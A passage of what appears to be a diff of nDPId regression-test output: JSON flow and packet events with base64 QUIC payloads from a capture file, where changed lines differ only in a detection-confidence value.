G7b4NxL6vNhgV9vEOYuD\/QGqwrXjwJs\/ispzj8Z6ANFL8uKgoOlsRFn5hpE\/fEX3ckmgeLqbknqG+NWj2t9zKylkyKmSKmy\/cxU0t1SSA8TuG2Qovkwr8Q5atDfcwDzjbYNh4vnD4EwH9iR13QsPu2AvJQjfH4r8xwFeP4P+BosOwdv7qI095S245vAYmXdL+TcX5rXjtvIGCma5M3p3OuUhnY0Sw5uOMqNm7nKPE8gz+Qsbb3VghujUa0NFn\/z6mc8MCrFJWDwY0gtXgCMv3nHx0GNtveZAICqjHZI7xwD\/RqR1lUZAfrPmAYo2kQrmshXTSHK1+8ZYJQvHmShCz6JQySscdlE647wVjnlBAZLUNr\/JBi7VMTdmpytCi6WzCx9AClMAzaYwBrTYGAmEVrVYJn1CaBDE26M0v0gm+S3JJIUIKMgBJtWD32fztac9Z5cAdjD4Hplc8RLAKlcnsRn\/BbxbFD\/d6tMg\/0CsxSInqyE8gbUz3lWbKWZ4OyOgUZwqm1QvYwlCMJMB6wEc+xPqoVbA"} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1621486317090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486317090,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZXtAAH4R2m40uxSv0OWdUcWcAbsFTgb1xv8AAB0I+xTa7lKQafkAAEU0t4azdHP6WARXvgfhEqAKpp3NRuHRg86uDYx6EraWfkB\/keNDFP3812WLSUJscegRJDC6DlMfTKSYGWjNCpVN8MkKLUxcf64j8OSn7gJZrI\/Q\/gKqY6Z8WIW7yXuifcAcxkC+cmw4eAjlyzZBZvU8ggZVByRRED2WeesmX9AerV06QYER0EbcO9+qzWXQ6Y1556b95esXVXYKwgaT\/JKPANtVx8JfgN8Vh1WXykc2J\/44ZDFpxZFRkUgHxJ3usOwxmesQs2TSh30GqcsvOPy1uBZE3aVlHsrZmfwcenRdsFblzJPQcAyj4L\/6\/V7LtEzbpK98ZznFjKlQ\/CAc0XOreT7lRX11x9l8Nwo5wz1cQeBW03aSFui9mnb+3x1mHZOfYliDqBYAh9AjahgYUEMLGQiqpnnOD59nJV21MaJqJDM\/LJMSKyy9TxlVb0G\/G5WjXSDrmaBMSxIJiiiNThOK4NxEJznmEgpU9sC2Kzrji4qQ4sLSQ6G6Z0s\/K5gmRdAHVqFaA+OXNLXjAWZslcHRAYBCopAeso5rNrNCUMASsOo0cU4hy3GR22hGlLj3LBUy\/ywcQOfX7XYMmNZHdOfJKOwbfgqm7seEpATTHBOfsy1pkFj95HcOrlD13hBtaabu3RXQXmH3nvQQ0rAeKIQPng6Rz1ptjgs6q\/CsEIrQ831zGr9a68MXwQ51qstfBpiZJmHO5lQoTCcztT\/VSQm16LxdoNEA+tXVtDTHWzSIJ\/LsE7pROWa4ORaidOXgt5TuUpfp4UISCbasJi8sLhnJLPMM\/EMJ23P7ba+yNMO1yGyYgCP8y3iA4+Y0RCdbxKqNpblS1T9\/mwKgrVDaW0XfBdJ9ftVX8k4Asxj7aK\/grpVoo1x51mqqsIA\/eHwsOupYQnvyOKi6jHUZB2gug+9nv8P0
lYzQYOI55nVygLmUPrt2mSQ2sxQZ3kNmobaJriv6tzeq4TnHl6oNqBTaUDSvgLoQFd9\/B93pzBto\/PWA85xxN7VZQOfd+DbFZ\/VBe73Qs+O+\/dsWYu8iQAMXiU4ipp9EIx\/uZoMUoWZj8rpSXDjEmLBbfMhJKI7th4AA0\/5pKTfK1Apef9X0Y5Kb2sWh24U\/M0c4i1SQdud1ypuHQGiudDhFPShSAhcPisWpjplWcdsEwxnBas4ojrBnnQjyHC2CNab1rcfTuqYLiJtZH+uFMNQqqo6\/rNfItXVpIQOkY7oH9NiquEBxGd5JMZV8xVdnW72qeBwOu707A4H9dx8aMxpNDFlsPT1CFtBo0+lBzmwd+U1J8RntLvUR++yoLGBfFoOFlBTxWd3EivQ+g4+hpsw6rhJx+o9KX12Wn+aCMzsyz2T+R275SnsosAVi6kZMH82nXvr3evy7oteFCprRiLgZZtTXZYQJnyvePz3+OCE1jJkDgtZz9lh5TRWEayVbmQ09oh0A2tO7l+b1MhJ9OOwh0tP+9C20L\/Rggyul58op2cZC7t0viwUloxNKFKHp6rLutsIgcRmAblAvmfE5evu8AKGMZAnbi\/qa50JLxEWg2ch014JrpjvQIgocJjdI4tVkdA1vAfzuTPMq6ZgpnlfebCtsmAjEOJvaC2jz2PpD3Da36F+9zqnKoYC4kArpMRPt1KxhhpnZuf4gUuyQNfw3N1IHRfKWJXJxGnUUH22LX3lkdvtG8ab43cqVRaBCEPVJUDvP1bY6E3TNNUkpsE2FLpbFaVjW8UTq4sTUXREoubs1+bmZBpV1b11ZgF\/sh+IuI5ZSadOQo47ZmlSoh\/ht"} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486318293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
+00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486318293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1621486369476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486369476,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaPxAAH4RXAU0uxSvYyqF9e6hAbsFTrhSxP8AAB0I+0NvIwjQu6UAAEU0azRBvw0HhuIl9\/xBjvifKak7sXpTLlmi+dbAR0gnHQ8yLpljofwXe+5I8+bjI6htbC0wktYLe9u1IbRrfn281Ygo9P+77SbfKFoWgOiNBP7DCcTYRMpm60boF\/tXFlu4RcDwIKHkE98LfcboNnZO6vgCOMNp2Oc0FW71MgnEMdGflqZG7oF457RNBS84xcpV6nGLNOdNKSMQqzQlO4jgRLIFlWEVMuZfPjKeCbFvi+9u443qZzhpp1RjViXLJQLM4O3xNtmwsrIybLL167f7g6DkkCHpv7D4g7Aegn0CUSGnhsDPpzH6vl+y+ZphsvLUKg8Up8DKE6OcuDZ2hrkBODY3w78BA6TwCijjXzbEkjwfOo6WXZ7anzvjy2rKeTxPqEDLbbU2mUP9vwNYzNXJKG2DUAsDLDw6z7pW\/sws6BGrQtkI4MswvtPP3tTOUG\/fE\/ztGz6sn0isa49Skrr5sdjTBckHoBSXiarAL+UhWVH3IgXrw7LDIqxiqdq7nRgSKmIzhN9fAbY6UXqQ932CN1pNDdZ9w\/GGn2o7t3bhxb5QVcZtml2RlYzXpD38XPIVBBQ47INhpeNulXlv8GPqMtdWTZebqe4kY7kqcVj0cQPvIwucmOBjpmJQg7KJ7oAQf9\/GJCRUlYyPpb8UxzZhEIeu3XefRjDZNtuoutnX0dz+oXCLYmdZjfP36HFbNYRByGa5fmywec37zgU\/qlyWBC2YCwex2EfvKOy9LWsTwa0ZT8kdxRFmJEv3ynISWQk6m6ALqZbKftEzLU53Sbc5IUV0op9T4rpP0U+RHeEC5OrRZtLDz7Eoi9XXjobuI3Vg8eC4MHSuUO6V5Xv0Nf3+ekeBTC4ZPF9uBseY\/M\/dl0+yfCT+XFaXx3GicyqgVnrvdtodSYLOXs8ya9nmPO\/qYXeXC3eiFr+iktgKCZgHHx3a+niakZlOQIdnQs8m+3FjMcPGf5iRRc1au20WBWADTpVoSMiHx7In8vZZ951ksDsiVML5vgKF3uCPIZiGrbd7epc75W0H66E6MYCh6UtGfeXcH48l\/e5dYlz+GnvNtX24qdsZ8ZjyXvychZ2KIR22+ZYaEiM\/DEMB6luZTBsCO\/v2zsreln6ASIp00NFiopmG5ECaS\/wzhc7cyOYeoLY+l9laxEBYEqW7mGrKnqBUW8CdAonXxsjkGQxEgjetP14OMrGziNFo3Hmm4YUyWifAkDAA0y29APcv6DiME4DgmAODMt0L6F2HG8ByP+NbokUTWDBX+4z7Vu5mleZba895fNmU9ORQiZpsGKf5KdpS60rinWsd7H7F5AaKkK9V8ehTTA2KJN4FeRKEoVzjZNBXQIIp68V\/vTf6MjitUwkEVupaAbIqjiysCSlLtNhGoB5fG+h4bOdXHXY5aevu6eMcfIv\/VbjnB55QeiEX\/EGcg3yTCoROSaMNCGVQt7zybtKYLEAyJsZQdEzgoFSBm\/aVw
sdOJLWiaQNxXr18wB2gwcynUtmY2OVRwX9j017xp7wGxmkp6fMo89Q5EZUZHfrQPUTsdLVxwrCtX8+BW19j1yLDE1jHz\/+hGjjVhkwiSSrUAMm3RWzCmyQbEXOdJpYEBon5bDAOn9LIToMnCQE86GVIS0UXQomCSYbZ4epFa1Ztm0zGdSLCKIfptcYOK6+a0cWvPAl+LZLk6bVf4IQ3VrJ2Pyo8DyjbC59d75TDSUXKmy1\/\/IRu4PkQCaoDSf88oNbPYxcEpRCESbf7WtoG6B+DEymuEdUAjcUwmOAZpwYnrVev"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02315{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1621486369781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486369781,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaQVAAH4RW\/w0uxSvYyqF9e6hAbsFTrnVzP8AAB0I+0NvIwjQu6UAAEU03RUajo54f3xaeQcz5ShQCKZJx+hnzaoOL+d9TDb2UYj2DFEQFg8O+PU04LqxBWrWZC6Jw7FAOK24WCy0+Qq+3W2m1Yj3lW4LJIV888sWjcqqlWbULhyMA\/KD5b8qufe+TPSdlntyuZPV2pTPKi5B+SQiTyl5FD9POY3+v3rSnfowAVM2nytoVtVAXU7ajofA6WeK40X1jrJmHBb8E8rErNsDpXfZzug5wr1qdAlbwVJRdAAFYIZgoB2\/qSq5jmhYNWc\/gyOteYYnvauiknHb14gnDW9kJk2AXthTxKyTuNGMMxIe8\/+57XTEdXgzJjfVFWlgu2dHS8t\/0D3vzl8kg3nUD3Et77FL6IMLHaLSMukGOY1oBOkzjqX9K7VF4oQZRG9WjeL8sHkc22npUwO8iu8Bg0QKzz6y1u\/WTGBcWCD6mmt7brbnyRuuQgJ5OSl+aUzFnuzYJwIcGCDmEAvg+d8QzbJwb0\/ydw6dj0OMY83exGXykPAMPH7d7uEh5qtWi73l2znhazBL+P6xXiAwMP5388MuTY+jv7myTvH2QegjTUhQrSoffjxgsBE+ew2qlWyIZdlD9xSPSQjzdG892xvO+Daqm0xCPE1\/DcTBrgTsBx5zRHmldCADLkPEXpDHIwwb64NYIN\/OgJT2Txk9iwrogjaIoAbzHDjBsRD+zjRv6ke5JHSd+l5VjHM2dZF9PUtL0DvVyYUjBO9tnDbTkEoPXCgLrgUFMpYiHso39U9eNfLO5kGqcHN+eOpKAvyRZVxKbK9+4n4VOyQK+R8se+nV68oYONIx4HlUc503SyGOap\/\/LCYROiGY4eaPDh7vr94Iu30hTjCiyIlio3ENmo2Xtpgx0y4zki182URjhdi2lMGGt75JESZeZfkA34f7hLFevCumcj6ijOjzZ0u42eGs\/RX\/7\/yBrnMjY+2gfiJ4TxqZChQis\/GYKAbD2JIuzCsi6V2Ubm8Nw35KDS+sB53W6Do27E2GSA2DWv+MzAm6zveezQDVV+o4OsT5neD4AAwgLFy\/Qy2xi+GZjSkZy8RSo3iRdAs62eGy1gVfhyPrNudRwVNEuWk\/dY2itlVJ+HJ28fJnpvvX3tj8I7p1+1yZJSjalMpM5yQmgJkG9WVckV8DGAWXv3xO8cB5OugwG77mQoMStI3vQGUXlb1t4\/i+fDw\/GuS4IZc1qT+z2tWNFMto35TYb7NCelxMcXuuM+fYamAktrAw
1KxhGvSXuYqr\/srgGiZhDyKLEbwtAm\/PUk8PsLr9uf3dxP9zKVSrZ3enmKDlUmAbwVi3hp78d\/5QtHvS4TMGUKLEXPCDhUSuwE7OOnJPgm+9br0i+fWDTX4tU91C\/jkplORo4Cj82ZnXtiWWPH0axQZfuh8nQGk2O3ZzNJTPqAtZI1gmIa6n7kNGEdgtaMX7Pg3vjDy68p5aVHfYpO\/dRKKWrMVDPCoBiAvp7eoWe9rRs4zHZdWniTJ3TJ\/1zSX8g\/p4+Y0B5FqL1OIXFwBjWTct4roreoqwYWuYvynwyepiVqQwZWkuHxiCkCJi1WnbBJ5iZfX\/8wWqdcHJRUcAJUNgCfoV7Ve\/zYSplpt9zSooIJyCI6uI9H8NvW80zzMgfGToxt4BHzDG95IPe8ajcFZ5KX0BoZRF14qIUNMRcwxWisnEuOIE\/Q+ayMiFBDXLhxu7NRovYXsWUIFNs5o2BFE\/MKTaf\/oZ0iEYees5KfoTm65JfoEaFJ9jS3QBRmZFIyZUE+OXP+Hcko2Pe\/+D7s3GVBk0cIMYErQi"} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1621486370391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486370391,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaQZAAH4RW\/s0uxSvYyqF9e6hAbsFTimxxf8AAB0I+0NvIwjQu6UAAEU03bTMBGYCrS8cnv5vhFjbtc1bGvAvFQnZB6yJG8NkcrmiIIJPIXl2q4dOP10rWX5YFWQXsyHMoGvgrIcWDVzIX3NZ7o8SxUndmlIUJBVqXEfKC6th0dxYBXCRfJJYWNyYrXmuN+Y0PL58UHK7tpZpgBK7mIQyQqSMZcKAs7IPHVXv2Sv3DGgEdMifspeJLZrqAdK5aSG9OqL\/1HP9dlfRJZOn5z1AX6j5z63ULJV5lG7V5bETO20pw88dGKcT+ZGMwvA69Sd5k0J76yF4otVf+nWsZJtlYGjXtglJhDbIRllnDv+E+a46adZELPbL8K3oBj6\/CCVCE2naOyEf6mPlfsVkBDeGjKbsRBu21pYLux7J6CXacUP3TFJ44akagTX\/8xKYW3ZaCu4Q0+BcjGnTHcCQO7kjxo2v3xqEKiOBagnZztVu8xYJUV1uSp0p84BGJGssQKgY2BPdhtNjFgTRBcdgKWi1F7+kUVb\/YTbwJyuRTa+PDvQQMNFOZgaYCsfjqFJWHKG2zIwkFspCoaCF8XtQGkCq9jE6y4qf4zjPbZ7N1UwwnwdZxfWb1Fw4aktZsDsenXL8B8X0NngfTME6MDZxvWCxHmQc5ppnjDsJXBvxCfHQyc9M7d8D8CeVC+HWbU67PYxUuKsITW5a7mAaKH0WaTJ26olLUeQA3GDIUFw9xUdggvpZTPLePjQefZEEfRjRjT8iEYeb9CzGQi6t+9fTQ6pc+9Rp6a50KYQ1uCZSpODozp\/OQcBEbdR9GtmHpCDR0JSPJbtOYkVGGl9N0B1JEmNoUvWkQjGNjAZe3zsIkxaJ57mePus0qsRip0mYliPwjYjUPzsCHzNeDVwVXuWpUcUzM2mUJOgikCw6XKjTRqaWuAqeW1c9z4mZTbOSK\/TxHcCg\/WiNrzmz+WTnbB9B
VLyyGE4vg7qJFN4PX2g3DqbfkifJRA9XPVuXHaYWBlDVz8FX3HNEQ6rLUkFa6eqyarqoeBLNt0e0nZn9mcxG4Qo9mD2OYNdYfux80GSAZIDpyIm8TDnnEmhS5z2HYyomgtO2Y4t\/N5FkVRx6yIfdqPtr7Ui3r9fpMCfazjmjrQ+LfRUxo6Q2p6YAAv1C6FuIqrLJVqHI\/kpJu7ZWHTe2PKlaiOnlj1A5JSK4vO\/0WUDs4dtC6LTCRT2cHR8t0Gej0FDzJ++VJbM\/YfPg8brEWZFYdpsvpeNzCryX37u4tW9MApgeHZ1fZQT7f+f0wNL3xb9nkBGv430\/o6aRXdV4rdsVK1Icwt6zKjtP4+M0EEPcPCQVgeyQEGAAiT3Uzle36U56GZffLsCMgG23H\/3Z1NKDWwffbKh1gfnfiwFVKdwun1Qt78gbk1vSqnomb\/J79AsHqjs4dj92ExlMBaeEeYS838CC1\/+GvM2TQqnNQGc0TBtsKDsLKmNN\/8BHFpN4K9oCP36JNjPgUtLnOiEpwlupSGWcDbtdi6ZFxy+Q7dsd+3esOK\/k1qXwrnT1z9erk299qqN\/tK39BUGopYzBcI7ZqtvWVyUcAQv4rkOvMHmT93EH9eAV\/HM1whxSr7kyLBcJNnJ8VG6vC+5b8Eiwd4KEvhX4SUFtdpJK\/juljSeDOnjRTvrONC\/wed2ymfPWrpUK94fPBsgVhs3zwEWHcezodeiB7xOvk8HZvWHvIdUWX23Dy5xvn5LYUigujlWn4Of6EawcMVeXgViQ66NNCX\/RKsSqrI\/0g0LQPkUhNuc1Z6LvT+izQ7m4p2uahClxy2m7stvMB02QAeTxR40TF5yA"} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1621486385474,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486385474,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZFAAH4R2lg0uxSv0OWdUcLYAbsFTiq5xP8AAB0I+aKrjQG3wPMAAEU0wuD+7fY6Iyc8tUyNR8o8NpWyUYFI2ltF3LBlXWefiS8pWcL74QB2DRW9zaYKiQLkhdAYa9TytEiykfGGocLbybyMzfU84hTMBvmtN9X8ZFMfEisph4kQ3rvmzIKxImtWYbPuenHPvncTyghAlfBjyTAs4SBTn7zgSiTlWDdrfi34xfTstE2uvPZkKaWey9pXrjtdmfzoUf\/pnc+joM+ZvbIOQcTsRmXe5mjiVNaJ6HbPiHfKS10CyjUY01LajnspTwPslYnWYHNLgwAGsyRZ3BxR6GzhK0yi77NGNugWOahmIQ6nR7Ydevwzssc8uD6\/61qD61eTpCJutHPvmpIMYyBaYt3YTvj7rWTy4+Jwluo7NCbmBS6erQnQ0BioBgOLfZKwMDge8tR1RT7fB2y73uabWZmh+z9EXiZif9vDBEIzL8O7i8XDK+n4f62Ye3t+bnf3T\/kEu06cpWij61xvDaapGt5KkkpyGLnr1+FLnojx+RRHnFHIYRBgk0R2kEDER0hHA1VeiOanzTBCFFmvwFA4TMEyQweEYvKw3Kr5NUAc2xOwhVaAL3S6xL\/Wk\/SHYOYp5f0PvIEoO7\/8io\/mEJnGHY\/3kgfXj71k\/T3+r2XctxV8PD3XFXtFnV1FZeROEc3BUlMypjGko0Tbxn8TLjIbiqBt40oHwVFVvr3zGWD1h4RU4S4gf9uyP8Ze+YtGqGo434thBMwnGvfjKdLhQJtIVyNEqyYwuvEvQSBGG+kgp7fWxhCxs3+fbhPQTRYk\/v3WUK2SO9YuJEstt\/h2vF9QgTemr9AIjZTwspLB5lVyViciTmGq8Sv0ccZicPe8AazPdv40uBUNsLwlJBWnFFcDvymaaOS6K09cWBdy0mbrwp8\/Qf2j\/wwjY+o0OYJsGRCGGQ6ET57ektTFjrSGOVwqV9ScfzX5znZD+H6kwkBf1O5IzmA+\/GA1wqzC5J9sUPvKCTirqPecQIYYVquKinZKzhsDVhUADXpFT0udOlKR0uhkOCRqJsNTXL\/mafXS3+PSGh99iH51SwtUUJntU0BR8enFfk1SrdSRAr8wyz4qsVel4jzWEdUfHV\/P86FFH+QEw1abjB2h3SRqAAOHmAfcG\/uY9ox6u2GzMWSaZnsaTqOVBeLeWcQzhkrU9Z0XOCXuT8oREqaNA5FtJW8KWw4W7AgsJOgQ6KKmOhxh\/Sa9xvwEc+UXuYo4+9\/295WwLPUiqlmI80sZ5MoN\/M3QtOiUpRW6uU50HQdEXpljpfNX1Ul8JoBTMhvcJ5NW+FyRXYKNMfEEmEJ\/bvF3\/j1YI05JniGjM6mnl++dN8BP+GVMRR9DzF5J5ULbCVwM0AAMJLiLlwhwq9U40MTPoWJnoX9YFggLWwj9lQC065dWBen4MPGk26TfmuuXGV+X8k4iX8RotxUbiRr+NVmhdaVnI0o8YdFg4IeDNDlpwLL0St6sT5ZrmettHNngu+I1PP
Obx1u4\/0P0MqDPvazomUz93QZhJKVKT9C6LEyLYcSjxTGXp1+z4ZDBBfwlu0ys9uEElkGFm3wDpJMIW9I5cCW\/YYdHy79zUfD6w9hQ\/hirJGoMOzA0yz\/\/oESSV5DpdQtEEpQVf+pa4YsPzNg2XIlz8e+OjE7mj5zn0kQEz19jUtEba97CNXLU5+IwcQj89kSD6mwJqhhNAA9qbQHiUlU2rWwCsntFwUpKLMMcVCHYrVsOlaOMOyK7dkwME8jMVzZFIiv19xEqG38D3uh5T3lqXB4+cO87sUlV0VfbSVX2jiLZmUKp"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":82,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486385474,"flow_last_seen":1621486385474,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621486385474,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":49880,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1621486385780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621486385780,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZZlAAH4R2lA0uxSv0OWdUcLYAbsFTtWuzv8AAB0I+aKrjQG3wPMAAEU0pYnq3I+Pk4UybR9VBssX3rW2MX9MykXuwtEl37HZjZdvUwqOPILmOs1ug3ZVyVxysW\/GbunfQvoEKJNeJUHr7ARioYosUv\/iMtw3zJNnqitKNycrvEvR+KPtynwqcEskqC+a0DoLcVg8G+1ytgtC5bHkcrgb6c+yvfYPM6bQHRedo3fqBnUH\/vo++7E8FATzPknFujoxXAfIqx5\/yGoMqH+HqtaMj\/gBvnONUQgLifilr2pN2X5UZtCvWUHfwSy\/ewC4h8t+MC5HX5kjR\/I\/PEFr21ZhBOTbRAIvsPlTMMkPaVFoJeMhvSPXH3RCxFq+4eYuMrUD0OhNOcPxOIZDZCyl0o\/ggv2DFXNJg+gVLPXoZbPB4iu5Uhmke6bpE2jqTUZPjwXEkBe6xV6sp6bLYYcswATmdDqFUEdmWGMKBAsMqXikUGSk8uiqTt95fjHy8nJN41GX4xtHHAni0YyIelafqSbckoVL1qDANQr0CxF7G13sR9plFiWW7O5A7e7cS9pe6mRYIxMGaciOe9ievt36yTBJ